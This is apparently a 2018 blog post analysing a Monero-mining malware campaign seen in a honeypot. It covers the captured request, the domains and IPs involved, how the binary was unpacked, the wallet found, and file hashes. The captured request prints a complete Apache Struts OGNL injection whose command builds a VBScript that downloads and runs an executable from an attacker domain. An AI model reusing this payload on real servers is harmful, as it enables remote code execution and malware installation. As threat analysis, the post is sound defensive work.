Saturday, December 8, 2018

Monero Mining Malware from Honeypot

Recently in a honeypot, I observed that the miscreants were looking for a vulnerability in an Apache Struts server running on a Windows Server.  Below is the GET request that was captured:




SrcIP:182.247.95.237 
HTTPCode:200 
HTTPVerb:GET 
URI:/index.do 
UserAgent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 
Headers:
Cache-Control:no-cache,
Connection:Keep-Alive,
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/5.vbs&
echo Set Shell = CreateObject("Wscript.Shell") >>C:/5.vbs&
echo Post.Open "GET","http://a46.bulehero.in/download.exe",0 >>C:/5.vbs&echo Post.Send() >>C:/5.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/5.vbs&echo aGet.Mode = 3 >>C:/5.vbs&echo aGet.Type = 1 >>C:/5.vbs&echo aGet.Open() >>C:/5.vbs&echo aGet.Write(Post.responseBody) >>C:/5.vbs&echo aGet.SaveToFile "C:/Windows/temp/download.exe",2 >>C:/5.vbs&echo wscript.sleep 10000>>C:/5.vbs&echo Shell.Run ("C:/Windows/temp/download.exe")>>C:/5.vbs&C:/5.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},

Accept:text/html, application/xhtml+xml, */*,
Accept-Encoding:gbk, GB2312,
Accept-Language:zh-cn,
Host:x.x.x.x:8000


As you can see above a file is downloaded from a46.bulehero.in.  The domain registration is through GoDaddy.  Below is the whois record that I found.  I find it fascinating that the Organization and State/Province is probably random keystrokes from a bot.




Domain Name BULEHERO.IN
Registry Domain ID D414400000006028492-AFIN
Registrar URL www.godaddy.com
Updated Date 2018-11-01T10:56:24Z
Creation Date 2018-05-09T11:12:14Z
Registry Expiry Date 2020-05-09T11:12:14Z
Registrar GoDaddy.com, LLC
Registrar IANA ID 146
Registrar Abuse Contact Email abuse@godaddy.com
Registrar Abuse Contact Phone +1.4806242505
...
Registrant Organization zanwu
Registrant State/Province uysf
Registrant Country AZ


Other subdomains that are associated with this malware that I have found with the associated IP Address and organization that they are associated with:



a45.bulehero.in - 139.162.27.37 - Linode LLC in Singapore
a46.bulehero.in - 139.162.74.150 - Linode LLC in US
a47.bulehero.in - 23.239.7.210 - Linode LLC in US
a48.bulehero.in - 139.162.74.150 - Linode LLC in US
a88.bulehero.in - 139.162.71.92 - Linode LLC in US
support@linode.com

Now going back to the download.exe file that is downloaded.  Evaluating the file we find that it is a Windows x86 binary.


Using the command "upx -d" on the file it decompresses it so that we can look at the binary.  I copied the original file of download.exe to original_download.exe becasue the upx -d command will overwrite the file in-place with the decompressed file.

Looking at the code you can tell that it has backdoor capabilities after it is installed, has the capability to send emails, and much more.  Within the strings of the output you can see that it downloads another file as shown below:


I then downloaded this file from the location and analyzed it further.  This malware was also UPX compressed.  I decompressed the file and conducted a basic analysis.  You can see that it contains backdoor functionality, mimikatz, a list of passwords for brute forcing, and more.  Below is filtered by the string "http" using grep -i.


We find another domain that is involved called heroherohero.info.  That is another rabbit hole that can be investigated.  The part of the binary that caught my attention was the Cfg.ini file.  This configuration file contains information to run a mineXMR bot.  The address of the wallet is in the screenshot below:


They are utilizing the Singapore MineXMR location.  If you lookup the address you can see the following screenshot:


This wallet is probably the benefits of infected computers.  At the bottom you can see that 123 XMR is the total paid which amounts to $46 each XMR for $5,658.  This is not much for the expense of others.

Here are the hashes of the malware that I collected from this analysis:

789072c3f9fe20c7aa691bb23fbfb0ce4239c659889bb1f19f9d81b8493dc117  Cfg.ini
b1017cb86875e7c4a6037db439769650384bca5439d9426cca844038a38c3f00  download.exe
bb2d54d74274dcc822481650d7025b06d0523b473b8f1b82fbd0efe67f196550  original_download.exe
06408e8b2d311cc6f7e85386f3acc4f3b3b8d7e4b4fbec27c49803ce66b2852e  original_unloadcur.exe
a7978d10e171d997a448214edca68e6c22980c0908183df59884f97ab7079322  unloadcur.exe

Enjoy...

No comments:

Post a Comment

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...